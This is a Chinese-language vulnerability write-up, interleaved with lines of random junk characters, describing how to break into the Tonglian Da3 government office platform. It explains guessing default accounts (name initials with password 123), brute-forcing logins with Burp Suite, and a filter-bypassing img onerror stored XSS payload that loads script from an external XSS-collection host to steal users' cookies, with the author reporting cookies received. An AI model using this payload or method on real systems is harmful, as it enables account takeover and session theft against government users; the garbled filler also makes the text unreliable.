) ^' m$ t( t7 l4 Q a x- F) J8 W/ s
8 K/ D* Q" U4 f( d# }+ Z' [ 同联Da3协同办公平台后台通用储存型xss漏洞; @' D$ I, d& U& \
' @6 |8 U- F& h! [& G/ x
7 n( X; m5 ^; C. j8 q 平台简介:- c3 l3 m" l2 l+ z' n _+ V+ Q4 Y
( }( V; c( j, O8 D + @0 d7 a c0 l
& d. q4 ?+ H5 F# f" c
_' w8 l+ s2 \( e: a2 D/ L - J- A" C4 d- d
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ O6 ]7 c" k* D+ r7 b5 b
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
0 D1 d! f2 ^ ?, h2 x- H同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!, t3 e8 R8 B5 Q: E* [- b ~+ J
+ Q" T7 O& V( p) f9 Z
$ u8 {3 v: \8 ]2 e9 S. X# B% V ) h5 r# s' c9 r2 n) p' W& \
; U( Z2 N5 H P1 d
) ?8 M( L9 y; N+ L; c9 ^1 ~ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:5 [+ e* j4 V2 L1 I) F
1 J- c0 k" M$ k7 t2 A7 b3 K
& n/ Q% ^0 n# n
" p. O7 c3 O C$ @
* O9 J( D* s9 \' l8 Y- u
6 x" e% @- n( K9 B e" ~7 t
http://1.1.1.1:7197/cap-aco/#(案例2-)
; C6 P1 I/ P5 w8 d" E4 |/ ]9 I6 F$ k
) a& ]7 e. x1 W. o 5 }) z1 j5 ^. F) b& J6 v
http://www.XXOO.com (案例1-官网网站)
. A: ~$ F2 f3 D4 y
* x9 u2 ?+ b8 p5 w4 [
/ S; }8 x& m+ A 漏洞详情:+ ~' i7 K J9 F6 J. n1 Y6 c
0 e) I' v) p5 k% {: d
( N6 z# Q4 S& E u: e* X0 f8 Y 案例一、
: _) X+ _; B7 G) ?7 W, H6 P* X0 M
: W v$ t+ Y1 C
$ b% l, T6 [4 a9 | 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
, e+ r' J% ~5 N& @
1 E5 C' g" Z* H: D. G4 I
+ z7 W( m! h0 J! K/ A1 _3 q 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:/ K9 y1 J5 K/ H
( T; U" [$ L9 `5 ^- b3 [, r
8 B; u) c6 W/ _, V" ^) E/ a3 A: a
* [) y4 o' S3 @& v2 Q. B' V
0 W5 H( T. Y& m# ^
3 I/ b6 Q' X! b- u
/ F$ @* z+ [6 D% u8 K, Z6 l
, g5 e! G+ n O
* P! N Y; m- h2 s% M
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
, n3 t' K2 x& h% R! [; G6 y
H! V4 {) y, u$ I" G. s6 _, B
8 H$ a4 ~4 l, w& ~6 d& N$ e- p5 \4 K, @ 5 f9 j3 A1 k. H# |, t4 P* m* K& H6 o
C0 R# _) i, i
, p' X5 }* J6 J3 s
9 |+ K! G, S' L
& b# g7 Z$ O2 r6 \( m' g
# r1 H: w4 q F0 F J& r 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
: {; j) N3 l9 H4 } w5 }, I9 j
! A& m# }, i9 q' F) [$ ~ * S' P" X0 g3 b- p5 R
4 e' b; R B* x/ \+ S% B( \ i
: v+ v5 x3 B3 r & ^# r; t( D' R6 n5 I
<img src=x
E( ?- X% ~+ V: Oonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: - J& x% E. x' a: y6 V# T
: V7 g. d. B6 t7 y ^. e
! Y, p9 d& w4 W; x
0 ?) c+ o* v1 P
: H, r- C+ I! H( E; h2 J6 v
- y, s/ i" E& P: x8 I, x 然后发送,接收cookie如图:
' M6 }1 |% v. |9 `
2 x1 f) Q0 ^# R: ]1 F 6 m# z7 y+ T [# K
8 N' N. _9 W6 A: d7 |/ u
3 S7 U8 z" |( D. I 4 N5 }. j: u/ o; g
, X7 {) x/ ~, `/ T4 B3 w" K q2 h
( ]+ U+ T9 R6 @, [3 d
9 n9 H: h4 r& n0 z6 }2 G. w
& F: T7 O' e/ w9 F2 J2 q
/ C( x0 @9 \5 d, }
2 R6 J( a# N3 o" W0 v
+ M/ O0 E4 a) e+ {* W
" ]+ g2 O9 C4 O% }! L( r
9 n. F& `/ L9 X* \. _7 X
: o' s" S' a3 Q( ~# d
4 c" P8 z" j# J7 ]; @6 y 7 K( u* U) A2 W: {: |
7 v- d/ x' h- J# H* c
2 |. y% r0 q% F. k* {" h) ]
; C4 T' R" N: D 8 S$ e9 W f0 ?3 j
8 s. L% \0 ~6 w5 X5 Q2 p+ |* n
; _, ^) C& t# C/ r! P
案例2、 " i" R4 z' x8 O7 o3 N
5 P7 w* X! D. \+ y/ e5 P
: s' h% o! e0 W/ i$ t- a3 w; U c 前面步骤都一样,下面看效果图:
3 \8 L- o8 _& B6 B4 O! H
( `6 B# g5 y# K1 C% T4 F
9 `3 Q- M1 E* ~ @0 m4 ^: s4 |
. J' b! h8 B( [1 r( N( M
, v, E+ h y- M0 r" Q
% ?2 m/ X" ^3 j- l3 T) d7 d0 _
! g8 ~' B% ?& d I6 Q
$ G. A( [7 d+ u. A
! K, [7 |9 Y2 f m& T( T# H5 n
# F7 I, j Y$ h' q
* }, D; M: }- q0 |! l+ K0 V
- L5 `. [. x6 j. q' N1 |2 m* U
1 f3 d# Q0 c' V: H# h/ h! f
. O% i- Z( @( n
# B; r- M2 r9 U: Q# p
" Q" |! o1 l# r$ N; x
" S9 y" W( u# {' _, o; g
' K0 f7 D* ^' e( b* {3 t
4 h/ ]( V6 x& S3 E2 Z% c) N
+ d' f3 H. h+ }0 M 8 S( t: m/ D! ~ ~0 q4 u% {
# \6 |4 d8 E& t) ` i* e% @
+ l: p' K3 }# L) T+ B
2 t! x( ]! I _& l ; U3 k* ~, f: j# [& ]6 |5 v
' b1 x3 o) w+ B% e" h! X, b $ `; c O+ O! w/ ~+ |
2 r1 q' _: B$ P. C: `/ s6 k, n
$ S7 b2 r& P* O, t/ Z7 y